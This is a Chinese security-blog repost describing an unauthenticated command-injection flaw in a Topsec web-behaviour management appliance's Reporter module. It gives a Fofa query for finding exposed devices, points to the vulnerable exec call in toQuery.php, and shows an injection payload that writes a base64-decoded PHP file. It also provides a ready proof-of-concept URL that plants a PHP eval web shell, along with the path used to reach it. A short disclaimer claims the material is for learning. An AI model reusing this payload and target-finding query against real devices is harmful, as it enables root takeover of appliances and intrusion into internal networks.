天某信上网行为管理系统RCE

admin 2022年8月24日02:50:05安全文章评论130 views880字阅读2分56秒阅读模式

    Nday0day的一个故事(也不算0day)首先来源是华域Reporter命令注入漏洞分析的文章发现是因为华域Reporter使用了一个组件导致的漏洞该组件的设备较多,多用于上网行为管理设备的报表系统,正好这个天某信上网行为管理系统也有

  该漏洞利用难度低,影响范围较广,无需登录可直接以root权限执行任意命令,从而控制该设备,进而控制内网其它服务器和终端设备,该设备一旦被控制,可能会影响到整个内网。


Fofa:

title=="Login @ Reporter" && body="天融信"app="天融信-上网行为管理系统" && title=="Login @ Reporter"

天某信上网行为管理系统RCE

 

漏洞分析

⽂件路径:/www/reporter/view/Behavior/toQuery.php

天某信上网行为管理系统RCE


通过代码可以看出

if ($_GET ["method"] == "getList" || $_GET ["method"] == "import") {

method=getList进入if分支并且objclass只要不为空就可以

天某信上网行为管理系统RCE

看到使用了exec函数$cmd可以通过objClass控制

天某信上网行为管理系统RCE

构造好$cmd参数的内⽤,扣出来本地调试$cmd的情况

天某信上网行为管理系统RCE

控制值

objClass=1|echo PD9waHAgZWNobyAiOWRhYTM1ZGFjOTYyZmIwOCI7Pz4= |base64 -d>/tmp/9daa35dac962fb08.php |grep

上传成功

天某信上网行为管理系统RCE

POC

/view/Behavior/toQuery.php?method=getList&objClass=%0aecho%20%27%3C?php%[email protected]($_POST[%22x%22]);%20?%3E%27%3E/var/www/reporter/view/Behavior/shell.php%0a


路径:

http://ip/view/Behavior/shell.php


此漏洞内部已知,本文章只做学习使用,任何非法行为与本公众号无关!

原文始发于微信公众号(河北网络安全高校联盟):天某信上网行为管理系统RCE

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月24日02:50:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  天某信上网行为管理系统RCE http://cn-sec.com/archives/1249554.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: